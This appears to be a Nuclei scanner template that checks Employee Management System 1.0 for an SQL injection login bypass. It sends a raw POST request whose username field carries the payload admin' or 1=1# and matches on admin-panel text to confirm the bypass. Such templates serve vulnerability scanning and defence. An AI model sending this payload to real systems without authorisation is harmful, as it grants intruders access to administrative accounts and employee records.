id: ems-sqli info: name: Employee Management System 1.0 - SQLi Authentication Bypass author: arafatansari severity: high description: | Employee Management System Login page can be bypassed with a simple SQLi to the username parameter. reference: - https://www.exploit-db.com/exploits/48882 - https://www.sourcecodester.com/sites/default/files/download/razormist/employee-management-system.zip metadata: verified: true tags: ems,sqli,cms,auth-bypass requests: - raw: - | POST /process/aprocess.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded mailuid=admin' or 1=1#&pwd=nuclei&login-submit=Login redirects: true max-redirects: 2 matchers-condition: and matchers: - type: word part: body words: - 'Admin Panel' - 'Log Out' - 'Employee Management System' condition: and - type: status status: - 200